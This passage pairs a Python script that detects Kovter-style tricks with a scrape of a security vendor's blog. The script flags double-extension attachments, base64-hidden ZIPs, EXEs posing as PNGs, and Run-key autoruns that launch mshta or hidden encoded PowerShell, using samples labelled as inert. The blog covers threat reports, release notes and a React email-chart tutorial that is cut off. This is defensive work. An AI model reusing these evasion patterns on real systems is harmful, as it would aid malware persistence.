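SCRIPT_EXTS = {"html", "htm", "js", "jse", "vbs", "hta", "wsf"}
DECOY_EXTS = {"doc", "docx", "xls", "xlsx", "pdf", "exe", "png", "jpg"}
ZIP_MAGIC, PE_MAGIC, PNG_MAGIC = b"PK\x03\x04", b"MZ", b"\x89PNG\r\n\x1a\n"
# Script hosts an autorun value may launch, and tells that the script is hidden or kept in the registry
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "regsvr32")
HOST_TELLS = ("regread", "-enc", "-w hidden", "frombase64string")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def double_extension(name):
    """Step 1: names such as Resume.doc.html or WebView-Plugin-Update-0.exe.js."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] in SCRIPT_EXTS and parts[1] in DECOY_EXTS


def suspicious_attachment_names(name, data):
    """Return the offending names: the attachment itself, or the members of a ZIP attachment."""
    if name.lower().endswith(".zip") and data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [m for m in zf.namelist() if double_extension(m)]
    return [name] if double_extension(name) else []


def html_embeds_zip(html):
    """Step 2: decode every long base64 run in the page and look for a ZIP archive inside."""
    for run in B64_RUN.findall(html):
        try:
            blob = base64.b64decode(run, validate=True)
        except ValueError:          # not base64 after all (bad alphabet or padding)
            continue
        if blob.startswith(ZIP_MAGIC):
            return True
    return False


def masquerading_pe(name, data):
    """Step 4: a *.PNG download whose bytes are a PE image (MZ), i.e. an EXE awaiting its rename."""
    return name.lower().endswith(".png") and data.startswith(PE_MAGIC) and not data.startswith(PNG_MAGIC)


def suspicious_autorun(value_data):
    """Persistence: a Run value that starts a script host and feeds it from the registry or a hidden/encoded command."""
    text = value_data.lower()
    return any(h in text for h in SCRIPT_HOSTS) and any(t in text for t in HOST_TELLS)


def scan_autoruns(entries):
    """entries are (key, value_name, value_data) triples; return the value names worth escalating."""
    return [vname for _key, vname, data in entries if suspicious_autorun(data)]


# ---- constructed samples (not real Kovter artefacts) ----
def _constructed_zip(member, content):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, content)
    return buf.getvalue()


SAMPLE_ZIP = _constructed_zip("Resume.doc.html", "<html>constructed placeholder</html>")
SAMPLE_HTML = ("<html><body><p>Install the Office plugin to view this invoice.</p><!-- "
               + base64.b64encode(_constructed_zip("WebView-Plugin-Update-0.exe.js",
                                                   "// constructed, inert")).decode()
               + " --></body></html>")
SAMPLE_FAKE_PNG = PE_MAGIC + b"\x00" * 62     # PE-style header served under a .png name
SAMPLE_REAL_PNG = PNG_MAGIC + b"\x00" * 16
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_AUTORUNS = [
    (RUN_KEY, "OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (RUN_KEY, "ab12cd", "mshta \"javascript:(constructed) eval(RegRead('HKCU\\\\Software\\\\constructed\\\\blob'))\""),
    (RUN_KEY, "zq1x", "powershell.exe -w hidden -enc QUJDRA=="),   # constructed; decodes to 'ABCD'
    (RUN_KEY, "Updater", r'"C:\Program Files\Vendor\Updater.exe" /silent'),
]


def run_checks():
    """Run every check over the constructed samples; returns a dict a playbook could assert on."""
    return {
        "attachments": suspicious_attachment_names("Resume.zip", SAMPLE_ZIP),
        "html_zip": html_embeds_zip(SAMPLE_HTML),
        "fake_png": masquerading_pe("img_0.png", SAMPLE_FAKE_PNG),
        "autoruns": scan_autoruns(SAMPLE_AUTORUNS),
    }


if __name__ == "__main__":
    for check, result in run_checks().items():
        print(f"{check}: {result}")
```

The file checks are what an FIM or mail-gateway hook would run on a new file; the autorun scan is what a periodic Run-key export feeds into log management.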

Threat Report Tuesday July 17th 2018

on July 17, 2018

In this week’s report we are covering two very malicious programs. If you have a BYOD policy you may want to pay attention to this first piece of research. Security researchers at Check Point have discovered samples of Glancelove, an Android-targeting malware, in a fake campaign originated by Hamas that takes advantage of the 2018 World Cup. According to researchers, the group is distributing Glancelove through fake Facebook pages and profiles with photos of attractive women who promote the malware in the form of a dating app available from the Google Play Store. The second piece of interesting malware we found is related to GPS and the vehicles that rely on it for daily transportation. A team composed of researchers from Virginia Tech, the University of Electronic Science and Technology of China, and Microsoft Research recently released their findings on the GPS Spoofing Hack, an attack vector that can send Google Maps users in the wrong direction. GPS spoofing involves replacing a user’s intended destination with a “ghost location.” Instead of connecting to legitimate satellite systems, the cyber-criminal behind the attack forces the victim’s software to connect to their own equipment, allowing the attacker to feed it false GPS data.

Malware: Glancelove
This Glancelove dating application asks for permission to use the device’s network connection, contacts, SMS, camera, and storage. Upon receiving permission, it contacts its command and control (C&C) server to download the final payload. The Glancelove malware is capable of recording calls, tracking location, opening the microphone, stealing SMS messages, taking photos, mapping storage, stealing contacts, and stealing images. Researchers mention that these mobile chain attacks are mainly successful because the targets are hand-picked, and the malware can continually install crucial components if needed. Two similar malicious applications used by the Hamas group are the Golden Cup and Wink Chat applications.

For more information there are a few links below:

News Observer

Some Mitigation Strategies:

  • Make sure to monitor your employee and guest wifi networks
  • Intrusion detection systems (IDS) would detect C2 communication for payload download
  • Web Filtration would detect the use of malicious URLs or unknown sites
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: GPS Spoofing Hack
Researchers used a HackRF One software defined radio, a Raspberry Pi, a portable power source, and an antenna. The attack could be hosted remotely with the spoofing equipment installed under the victim’s car. Researchers concluded that a seasoned and logical driver who is familiar with their route and destination would notice the change in their Google Maps application. However, if the location and route are unfamiliar, a user might not realize that they’ve been deceived. According to researchers, their experiment only failed when they were testing the luxury car Tesla 2014 Model S. They stated that this was because Tesla uses an advanced u-blox navigation chip, which contains an anti-spoofing function.


Some Mitigation Strategies:

  • u-blox navigation chip, which implements some anti-spoofing function
  • Intrusion detection systems (IDS) to monitor for malicious communication
  • 24x7 Security Monitoring to check for GPS consistency with locations of vehicles

Release Notes

July 13, 2018

  • Improve the usability of the new Analyzers section in Alert details
  • Enhance the MSSP Analyst Activity report with new metrics and improvements

  • Fix a bug preventing some suppressions from being created on the new Alerts Beta page
  • Prevent the app from going blank when unhandled exceptions occur
  • Fix an issue with some servers not rotating logs, resulting in slow or inconsistent response times

We’ve been working on major infrastructure enhancements that will enable us to release some exciting new features over the next several months - stay tuned!

How to boost your FFIEC CAT score, Part 1: What the CAT dragged in

on July 11, 2018

Since the Federal Financial Institutions Examination Council (FFIEC) introduced the Cybersecurity Assessment Tool (CAT) a few years ago, financial institutions have finally had a prescriptive path to operational cybersecurity maturity recommended to them.

So what has the CAT brought us?

  • Financial institutions welcomed the CAT. While institutions aren’t required to complete the assessment, examiners use it as their framework when assessing institutions during exams. The CAT was intentionally vague and lacked specific guidance; but it did act as a tool that gave institutions the right amount of autonomy to grow in the areas they saw fit while adhering to the suggested path to maturity. It introduced new concepts, including Domain II, which covered complex topics in Threat Intelligence and Information Sharing.

  • It’s tough to evolve beyond the baseline requirement of “belonging or subscribing to a threat and vulnerability information sharing source that provides information on threats”. At my institution, we were already ahead of the curve by belonging to the FS-ISAC and being active with their various Community Institution and CyberIntel mailing lists, but the volume of information coming through was too much and mostly unactionable at a small institution like ours. There was a struggle to find a product to help cover the information overload and make the information actionable without increasing headcount or level of effort in information security resources.

  • This gap in coverage is where Perch Security has found a niche in financial services. I was a Perch user before I was an employee. I loved the product because Perch boosts an organization’s CAT Domain II maturity level and helps cover many other controls that are part of a well-defined cybersecurity program. From threat intelligence detection and response to participation in threat intelligence communities, Perch helps make up shortfalls in stretched budgets of financial institutions by backfilling with People (managed 24x7 SOC services), Process (helping bring structure around escalation and initiation of incident response and threat intel consumption) and Technology (automating the detection of the threats on your network).

Look for future blog posts From Michael Riggs, CISSP, that will cover achieving maturity in specific CAT domains.

Threat Report Tuesday July 10th 2018

on July 10, 2018

In this week’s report we are covering two very malicious programs. Researchers identified a Remote Access Trojan (RAT), dubbed FlawedAmmyy, targeting the Ammyy Admin remote desktop tool. FlawedAmmyy is built on leaked source code of Version 3 of Ammyy Admin and provides unfettered remote access to the target system. This campaign, which the researchers attributed to TA505, includes both a broad spam campaign and more targeted campaigns against specific industries, including the Automotive Industry. Since its inception in December 2017, GandCrab ransomware quickly became one of the most significant cyber threats of early 2018. Based on a Ransomware as a Service (RaaS) model and distributed throughout the dark web, the malware targets multiple countries around the world using a sophisticated combination of malicious tools. Despite the recent success of law enforcement authorities and the security community, who managed to slow down the proliferation of the first version of GandCrab by releasing a free decryption tool, updated versions of the ransomware continue to attack thousands of victims around the world. GandCrab RaaS is the first ransomware in the world demanding ransoms in DASH cryptocurrency.

Malware: FlawedAmmyy

Though just recently discovered, there is evidence the campaign started as early as 2016. Also worth noting, this campaign utilizes the Server Message Block (SMB) protocol, rather than HTTP, to download the malware to victim machines, which may be a first for this type of malware. Aside from the concerning implication that this trojan has been used undetected since 2016, one of the most interesting aspects of this malware is its combined use of ZIP files containing .URL files (which Windows interprets as Internet Shortcuts) and the SMB protocol to deliver the RAT to the victim.

For more information there are a few links below:

Hack Dig


Some Mitigation Strategies:

  • File Integrity Management looking for the installation of files associated with the RAT
  • Intrusion detection systems (IDS) would detect communication over SMB and C2
  • Web Filtration would detect the use of malicious urls
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: GandCrab

According to security analysts’ estimates, the initial version of the malware was poorly developed, which allowed for the development of a decryption tool. However, GandCrab creators quickly corrected flaws, and the integrity of subsequent versions proved to be more reliable.
It is reported that an earlier flawed version of GandCrab had a decryption key stored on victim machines, which in turn was encrypted with the same password. However, the issue was promptly addressed by the GandCrab developers.

In its activities, the ransomware’s operators use the decentralized Namecoin DNS (domains with the .bit extension).


Security Affairs

Trend Micro


Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication to C2
  • File Integrity Management is looking for new files being installed on the system
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Wednesday July 2nd 2018

on July 2, 2018

In this week’s report we are covering two very malicious programs. Security researchers have spotted a new Mac malware family that’s currently being advertised on cryptocurrency-focused Slack and Discord channels. The other is the Nozelesn Ransomware, a crypto-threat that was reported on July 2nd, 2018 with numerous submissions to security platforms. Unfortunately, the Nozelesn Ransomware leaves little or no trace on compromised machines, and creating detection rules turned out to be troublesome. The team behind the Nozelesn Ransomware appears to target users based in Poland, judging from the initial submissions and the way it spreads to PC users.

Malware: OSX.Dummy

Security researcher Remco Verhoef recently discovered OSX.Dummy, a new Mac malware family that is currently being spread via cryptocurrency-focused Slack and Discord channels. Cryptocurrency enthusiasts are convinced by attackers to type a long command inside their Mac terminal with the promise that it will resolve various issues. The command downloads a 34 megabyte binary named “script” to the /tmp folder and runs it. The “script” file then sets itself as a launch daemon to maintain persistence. It then creates a Python script that opens a reverse shell to a server, which gives attackers access to infected hosts. The server can be traced back to Additionally, after the code is run, the malware requests the user’s root password and saves it unencrypted in a file located at /Users/Shared/dumpdummy and /tmp/dumpdummy, allowing the attacker ease of access for future malicious operations. Researchers state that the malware is simplistic and easy to detect with standard malware detection tools.

For more information there are a few links below:


Bleeping Computer

SC Magazine UK

Some Mitigation Strategies:

  • File Integrity Management looking for the installation of python scripts into /tmp and /users/shared
  • Intrusion detection systems (IDS) would detect network communication over port 1337
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: Nozelesn

Security researchers at MalwareHunterTeam have discovered a new ransomware named Nozelesn. Researchers first noticed chatter regarding the malware from multiple Polish victim submissions to ID Ransomware, as well as a newly started discussion among victims on the BleepingComputer forums. According to a researcher at CERT Polska, the Computer Emergency Response Team for Poland, the malware is being distributed through spam emails imitating a DHL invoice. Upon successful infection, files are encrypted and given a “.nozelesn” extension. Following encryption, the malware creates a ransom note offering to fix the computer, labelled HOW_FIX_NOZELESN_FILES.htm. The note contains instructions together with a personal code to log in to the Tor payment server “lyasuvlsarvrlyxz.onion”. The ransom is currently 0.10 BTC or roughly $660 USD.


Cyber Byte

Londrina Security News

Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication
  • File Integrity Management looking for new files being installed on the system
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Release Notes

June 29, 2018

  • Add firewall support to the new Alerts Beta page
  • Improve the user experience around group and community-level suppression
  • Add single and multi-organization support for MSSP users in the new Alerts Detail page
  • Add a “related alerts” section to the Alert Detail page for quickly viewing other alerts created by a specific indicator

  • Fix an issue causing incorrect alert counts on the Indicator Detail page
  • Fix some issues that occurred during the registration process
  • Fix some Perchybana queries that respond slowly or with an error
  • Fix an issue where some alerts would not remove themselves from the Alert List page after suppression
  • Fix some sensors that would report invalid timestamps on some network traffic

We are still actively enhancing the new Alerts Beta and Alert Detail pages. If you have suggestions or questions, please reach out to the team in SquawkBox.

Threat Report Wednesday June 18th 2018

on June 18, 2018

In this week’s report we are covering two very malicious programs. The first is a custom remote access trojan (RAT) called UBoatRAT that is being distributed via Google Drive links. The malware obtains a command and control (C2) address from GitHub, and uses Microsoft Windows Background Intelligent Transfer Service (BITS) for maintaining persistence. The other is MirageFox, a new tool produced by APT15 that looks to be an upgraded version of a RAT believed to originate in 2012, known as Mirage. The researchers track the new malware as MirageFox; the name comes from a string found in one of the components, which borrows code from both Mirage and Reaver.

The RAT is usually delivered by a ZIP archive hosted on Google Drive containing a malicious executable disguised as a folder or Excel spreadsheet. Once installed, UBoatRAT checks for virtualization software and tries to obtain a domain name from the network. The malware only performs malicious activities on a machine when it is able to join an Active Directory (AD) domain. The malware is also programmed to detect virtualization software (VMWare, VirtualBox or QEmu) that would indicate a research environment. Since June, the GitHub “uuu” repository the C2 links to has been deleted and replaced by “uj”, “hhh” and “enm”, according to researcher Hayashi. The GitHub user name behind the repository is “elsa999”. For more information there are a few links below:


Tech Target

Threat Post

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious links that relay to Google drive
  • File Integrity Management looking for the installation of malicious zip files that unpack executables
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: MirageFox

The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware borrowing code from one of the tools it used in past operations. APT15 is known for committing cyberespionage against companies and organizations located in many different countries, targeting sectors such as the oil industry, government contractors, military, and more. The attackers utilize Windows commands to conduct reconnaissance activities; lateral movement was conducted by using a combination of the net command, mounting the C$ share of hosts and manually copying files to or from compromised hosts.


Security Affairs


Virus Total

Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication
  • File Integrity Management looking for new file installation
  • Log Management would collect data on C$ shares and other lateral movement
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Monday June 11th 2018

on June 11, 2018

In this week’s report we are covering two vulnerabilities. One is a recent vulnerability targeting Triton ICS deployments; the other is a banking trojan that stealthily uses MSSQL database traffic.

Malware: Triton ICS Malware Developed Using Legitimate Code

Triton, also known as Trisis and HatMan, was discovered in August 2017 after a threat group linked by some to Iran used it against a critical infrastructure organization in the Middle East. The malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, which use the proprietary TriStation network protocol. The malware leveraged a zero-day vulnerability affecting older versions of the product through a legitimate .dll file. For more information there are a few links below:


Security Week

Dark reading

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious phishing or targeted email campaigns
  • File Integrity Management looking for the installation of malicious software like Remote Access Trojans (RATs) for functionality and access
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • Filtering USB ports that are on equipment connected to the ICS systems
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: MnuBot Banking Trojan Stealthily Uses MSSQL Database Traffic

Security researchers from the IBM X-Force Research Team have discovered a new banking Trojan named MnuBot. This Delphi-based malware uses Microsoft SQL Server to communicate with the C&C server and send commands to infected machines. This evades regular antivirus and malware detection since it uses SQL traffic, unlike common C&C server communication that happens through web servers or apps. Researchers also indicate that this might be coded by a seasoned hacker. MnuBot has a two-stage attack. First, it checks whether the system is already infected. Second, it fully deploys the remote access trojan (RAT).


Security Intelligence


Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for malicious communication and downloads from port 5003
  • File Integrity Management looking for access to registry keys accessed and new keys created
  • Mail Filtration to capture potential files attached to phishing emails
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection

Threat Report Wednesday June 5th 2018

on June 5, 2018

In this week’s report we are covering two vulnerabilities. One being a recent Microsoft Windows Jscript vulnerability that has yet to be patched and the other being NavRAT with themes around the upcoming US & North Korean Summit.

Malware: Zero-Day Remote Code Execution Vulnerability Discovered in Microsoft Windows JScript

A new zero-day remote code execution vulnerability has been discovered in Microsoft Windows JScript that allows an attacker to run arbitrary code on vulnerable installations of Microsoft Windows. “This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” To exploit the vulnerability, the attacker has to trick victims into accessing a malicious web page or downloading and opening a malicious JS file on the system. As of June 1st, no patch has been released, so up-to-date security content is key for detection until one is available.


Threat Post
Security Boulevard

Some Mitigation Strategies:

  • File Integrity Management Solutions for file creation and modification
  • Intrusion detection systems (IDS) to monitor for malicious communication and downloads
  • 24x7 Security Monitoring with Focused Security Content for solid threat detection
  • Web Filtration Technologies to screen incoming web sites
  • Mail Filtration to capture potential files attached to phishing emails

Malware: NavRAT Malware Uncovered by Security Researchers

Security researchers at Talos Intelligence have recently uncovered NavRAT, a remote access trojan that has reportedly been quietly active since 2016. NavRAT is distributed through a malicious, decoy Hangul Word Processor (HWP) document named “미북 정상회담 전망 및 대비.hwp”, which translates to “Prospects for US-North Korea Summit.hwp”. The decoy document appears to be referring to the US-North Korea Summit scheduled for June 12, 2018. Known targets reside in South Korea. Researchers note that NavRAT is unique in that it uses Naver, an email platform popular in South Korea, as its command and control (C&C) server. NavRAT can reportedly download, upload, and execute commands, perform keylogging, and avoid detection through process injection, copying itself into an active Internet Explorer process. Researchers assess with a medium degree of confidence that North Korean APT Group 123 threat actor is behind the operation due to the techniques and procedures being of similar nature to those used in previous campaigns.


Dark Reading
Talos Intelligence

Some Mitigation Strategies:

  • Mail Filtration to screen for malicious phishing or targeted email campaigns
  • File Integrity Management looking for the installation of malicious software like keyloggers
  • Intrusion detection systems (IDS) would detect intrusion and network communication
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Release Notes

May 18, 2018

Login and Signup flows have received a facelift and refactoring, to go along with OUR NEW PUBLIC WEBSITE!
The punch++ community configuration has been given an additional + and is working once more
Pagination and search added to login history views, because some people log in a lot
Alert indicator detail and Perchybana buttons now open in new tabs, instead of the current tab. Now feel like a real security pro by having 50 tabs open at once!
New alerts list is in beta - we’re trialling it internally with our own SOC team to make sure it has all the bells and whistles that our power users will need to triage their own alerts!
Cortex integration is in beta - the moving parts are mostly in place and we’re working out the details about how to handle user configurable settings and API keys. We’re very excited about the potential between a Perch/Cortex integration and have all kinds of cool ideas how to work it into the Perch app, stay tuned!
Community sightings public API is in beta - currently testing with some select internal customers!
User submission of raw sensor rules is in early functional stages - we have the functional parts in place, but there are some wrinkles we need to iron out first before we release to the general public.
The group invite process has had a couple of minor bugs fixed that were preventing some users from using their invite codes.
Invites to existing teams no longer prompt the new user to set up a sensor before using Perch.
Existing Perch users that are already logged into Perch can now use the group invite link from the email
Community suppression view all page rows per page now actually changes the number of rows shown per page.
Group invite modal now clears invite email addresses between openings
The cancel button on the MFA entry page during login works once more
Community file lists now correctly update when switching between communities
Copy to clipboard buttons should no longer force the page to scroll to the top
Login (and other pages) should no longer do the shimmy dance with scrollbars on Windows Chrome
Users on slow connections with access to multiple groups should no longer see weirdness when rapidly switching between groups.
Not officially supported, but we fixed an IE11 white screen error for the dashboard. If you’re using old versions of IE, upgrade!!! Old browsers aren’t secure, don’t use them; we’re security professionals, this is low hanging fruit!

Release Notes

April 20, 2018

Alerts review first pass: We’re days away from releasing the first part of our alert review project. Most alert panels are being streamlined and we’re introducing the alert details page. This page is similar to the indicator details page, but shows enhanced details about the selected alert instead. The information we’re removing from the alert rows will show up on the new details page, along with additional information about the alert, and details about the intel that triggered the alert.
  • More coming soon:
    • Related alerts - a full breakdown of all of the individual target pairs involved in an aggregate alert.
    • Alert comments - put comments directly on a specific alert instance, instead of on the intel the alert triggered on
    • Additional enrichment - we want to show you more information about the details involved in the alerts
    • After coming soon, next phase:
    • Alert Review page enhancements:
    • multi-select: change status, suppress
    • performance! much, much faster
    • better search, sorting, filtering
Re-opening the ‘Invite user to group’ modal now clears the invite email field.
Dashboard sensor health widgets now use the same rules for status as the other sensor health displays and pages.
We had a performance issue with the generation of the Perchybana links from suppressions, so we had to disable them. We’ve fixed that issue and the links have returned.
On the indicator details page, in the observable panel on the left, observables that are currently triggering alerts will once more be highlighted (and there was much rejoicing, huzzah!)
(In Development) Perchy’s hard at work improving his brain - we’re adding support for TheHive’s powerful Cortex analyzers as part of our alert detail enrichment efforts. There are all kinds of valuable ways to analyze the alerts that we’re detecting, and we want to bring them all together in one easy to use interface. We’re experimenting with adding Cortex analyzer details to the information that you see in the Perch interface. Open up an interesting alert’s details, flip to the Analyze tab, and we’ll have the info you’d normally have to go digging for right there in front of you. Kick back, drink coffee, enjoy the sweet, sweet automation.
Perchy is recently back from down under where he’s been setting up our first non-US regional data center. We’re working through the final stages of configuring our systems to handle the data sovereignty needs of our worldwide customers. Soon you can get flocked up, no matter where in the world you are!
Data migration work - it’s not sexy, the guys who do it don’t have any cool new widgets to demo, but it’s gotta get done. We’re continuing our work on internal projects to keep the Perch architecture and data flow well tuned so that the app and Perchybana stay responsive and don’t feel like a chore to use. We’re watching the charts, we see what parts of the app are sluggish, and we’re working on them!

Release Notes

April 6, 2018

Initial changes for Alert review (on QA) -
  • alert rows shown in panels condensed
  • new alert details page - see more information about what triggered the alert
Header update - new navigation, new look.
New user onboarding experience, tour replacement.
Added reverse DNS names to alert IP addresses, where available.
Arbitrated a disagreement between the actual number of alerts and the number shown on the tab of the review alerts page.
Clicking the link from a Perch team invite email will now pre-populate the email address field, to ensure that the email address used to sign up matches the email address that the invite was sent to.
Invite email invites aren’t quite so particular about the case of the letters in the email addresses matching.
Dashboard true/false positive by community charts were displaying data for all groups in shared communities, they now show just the selected team’s data.
We’ve recently upgraded our core front-end application framework React to version 16. This is a major version update which affected every part of the Perch application, we’ve tested and tested, but if you discover something broken, please let us know!

Release Notes

March 23, 2018

Perchy has a new place for YOU to land: the new dashboard is live and it is awesome! We want you to have the most valuable info possible dropped right in your lap right away; Perchy prepares it all and brings it right to you, like a faithful hound with the morning paper. Escalations, recent alerts, and suppression information is near the top, scroll down to see info about your communities, your sensors, and get some insight into overall network visibility and ‘noisy’ hosts.
‘Since You’ve Been Gone’: you might not miss Perchy while you’re away, but we don’t want you to miss out on the important details about what’s been happening since you’ve been gone. Every time you log in, you’ll be presented with a quick overview of important activity that happened while you were logged out: escalations, alerts closed, comments, new intel, and sightings of your personal indicators. You won’t need to manually log out to take advantage of this new information, just close the Perch app when you’re done using it.
We’re adding reverse DNS name information to our alerts, so that it’s easier to relate a private IP to a named host. Look for this new information in the ‘src_FQDN’ and ‘dest_FQDN’ fields on alerts in Perchybana. In the future, we’ll be incorporating this new data into more elements of the UI, for easier identification everywhere.
Snackbar/toast notifications (the little panels that pop up from the bottom of the window) message color should now be easier to read.
Returned the ‘Select All’ button to its rightful place on the community feed selection modal - no one likes having to click those boxes one by one.
As usual, there’s a bunch of tweaks and performance tuning that we’re doing to keep the app snappy and responsive. If you run into something that’s loading slowly for you, or feels like a chore to use, LET US KNOW! We love the feedback and we’re always on the lookout to hear it directly from our users!

Release Notes

March 9, 2018

New Dashboard: Incorporates feedback that we’ve collected from our users and should put more relevant information directly in front of you as soon as you log in. You can get a preview of the new dashboard here: (Still a work in progress and you can expect to see more updates in the days to come.)
IP suppressions can now be applied to multiple IPs at once. This will create a separate suppression per IP, just as if you’d manually created them one by one.
Observable dashboard panels now have a toggle between top 5 and bottom 5.
Alert status changes added to indicator detail history tab.
Fixed a bug with the CSV download of community suppressions, CSV should now contain just the data for the current filter settings.
Fixed a significant performance issue in the community suppressions panel, should load much, much faster now.
More minor UI fixes here and there, sorted some lists to make selection easier.
Observable dashboard SSH and SMTP tabs now return all data.
Community latest suppressions now visible to all users, not just community admins.
Internal changes to support more types of external data sources and more use cases for community data sharing.
We’re working on improving our support for MSSPs, allowing users from one group to manage other groups, without actually having to be a member of the group.

Release Notes

February 23, 2018

We’ve added a new section to the Community Dashboard: anonymized, latest true/false positive detections for members of the community. Now you get a better view of what everyone in your community is seeing and how they’re responding. As a bonus, we’ve made the lists available as a CSV download!
On the suppression modals, we’ve moved the contact information to the main view and removed the tabs. This helps make sure our SOC has the info they need to triage your alerts right in front of them when they’re preparing a suppression.
Groups on the alerts by host page now start off collapsed
Perchybana links slightly adjusted to show more relevant HTTP fields by default
We’re adding the raw Emerging Threats (and Pro) Suricata rule to the indicator detail page
Sign up adjusted so that browser password managers don’t try to use your Last Name as your user name
Fixed the comment visibility drop list UI issues and missing descriptions
We’ve crushed a multitude of little bugs that cropped up during our recent UI library upgrade and while polishing up the new observable detail view. Too many to list here, but if you find something we missed, LET US KNOW and we’ll fix it!
Major UI library upgrade: keeping your tech stack up to date is important to continue to develop features using the latest tools and security fixes, and as a security company, that’s especially important to us. We’ve recently focused on upgrading some of our core application libraries to keep things running smoothly and securely.
We’re in the middle of a pretty major intel storage refactoring that should enable us to see some real performance gains, especially for our larger customers and our SOC. It’s still a couple weeks away from being finished, but we’re already excited about the new hotness that it will allow us to build.
Coming soon: XFF on alerts, multi-IP selection for IP suppressions, show all targets on closed alerts, new dashboard, and more!

Release Notes

February 9, 2018

Observables Dashboard internal release and testing - we’ve wrapped up development and now we’re putting it through the wringer to make sure that everything works and looks great with our production data. There’s still a few small tweaks and adjustments to be made, but it’s really close and the details it exposes are just … wow! We can’t wait to show it to you.
Better internal intel curation tools that automatically trim out the obvious stuff to keep the response time better for everyone.
Bits and bobs here and there, mostly on things no one sees directly.
Library updates - we routinely update all of the external code that we use to make sure that everything is staying modern and secure. Recently, some of the core libraries used to make Perch awesome have had major version releases and we’re making sure Perch gets updated with all the performance and security benefits as well.
UI cleanup effort - we’re big proponents of agility here and we frequently favor getting a working feature out over making the experience perfect. We’re taking some time to clean up some of those rough edges and starting a larger scale effort to make the functionality and tools that are core to Perch even better.
Intel Data Refactoring - We’ve learned a lot of things about how the data we have is used and we’re working through some data restructuring to be able to give our users better and faster access to the information they need to make the best decisions.

Release Notes

January 26, 2018

Scope (w/ IP) added to the suppression list on the indicator detail page
Link added from user indicators to group indicators (if you’re the admin or owner of a group) and vice versa
Suppression groups on the indicator detail page are now listed alphabetically, instead of randomly. (Apologies to any SOC who will miss playing ‘Find the Group Name.’)

React in Outlook? How we built the Weekly Indicators Summary

on January 24, 2018

Email has always lagged behind the browser in terms of features and capabilities. While in the latest version of Chrome or Firefox you can play console-quality games, make music, and share your screen, email is a very different story. Getting a layout to look consistent across devices or sharing the joy of an animated GIF are things we take for granted on the web, but can be frustrating to deliver to your inbox.

Weekly Summary emails

If you use Perch, you’ve probably gotten one of our new Weekly Summary emails by now. For everyone else, they look a little something like this. Our emails have always had a lot of information, but as our customers have had more sightings, alerts, and intel, it can start to feel overwhelming. Chances are pretty good your inbox doesn’t need any heft added to it, so when redesigning the Weekly Summary we wanted to help our customers get as much insight as they could with as succinct an email as possible. By highlighting trends and counts in colorful charts at the top of the email, we think the Weekly Summary gives you more actionable information faster than ever before.

Testing the limits of email

Those charts are a key part of the new design, but charting in email has been avoided by many a dev team. There are some “hacks” you can do to sprinkle some data-viz magic into your emails but often times they aren’t pretty or scalable.

If you have a single chart to send (and time on your hands), you could try making a static copy of the chart in a design program like Sketch or Photoshop and saving it as an image to include in the email. But with a flock of customers and billions of data points that change by the minute, that won’t work here.

In previous Perch emails we have created simple bar charts with CSS, but every email client has slightly different support and the code gets messy fast. No one wants to maintain a Rube Goldberg machine, especially one made of CSS.

With the Perch product, we use React and Recharts to create beautiful, reusable charts with live data for each customer. We can’t use this approach in our emails though, because most email programs will not allow us to execute JavaScript. This means no React, no Recharts, and no real-time chart goodness.

Leaning on the community

Our dev team did some head-scratching, white-boarding, and forum-surfing before we found repng. Repng is a JavaScript library that allows you to convert any React component (like a LineChart from Recharts) into a PNG. So now, we can reuse the same charts we know and love from Perch in our emails with just a dash of CLI magic. Running the process on a Node.js micro-service, we can easily pass all the data we need for the Weekly Summary to the chart-to-png service, generate the email-friendly graphic, and send the email out the door with 100% more visual goodness.

Show me teh codez

Want to add some charts to your emails? Here’s a quick starter that will get you going in the right direction.

Start by grabbing node and npm if you don’t have them already.

We need to install all of our dependencies first:

npm install react react-dom recharts repng express body-parser

Then we can set up our Express server to listen for incoming data:

const bodyParser = require('body-parser');
const express = require('express');
const React = require('react');
const { LineChart, Line, XAxis, YAxis, CartesianGrid } = require('recharts');
const repng = require('repng');

const app = express();
const port = 8080;

// Add middleware for reading JSON bodies
app.use(bodyParser.json());

// <LineChart width={500} height={300} data={data}> ... </LineChart>
// This is the JSX you may be more familiar with,
// but for the sake of not dragging babel into this
// we will use the "vanilla JS" flavor of react in this snippet.

// Note: "data" should be an array of objects that have an:
// amt: Number | name: String | pv: Number | uv: Number

const chart = props => React.createElement(
  LineChart,
  { data: props.data, height: props.height, width: props.width },
  React.createElement(XAxis, { dataKey: "name" }),
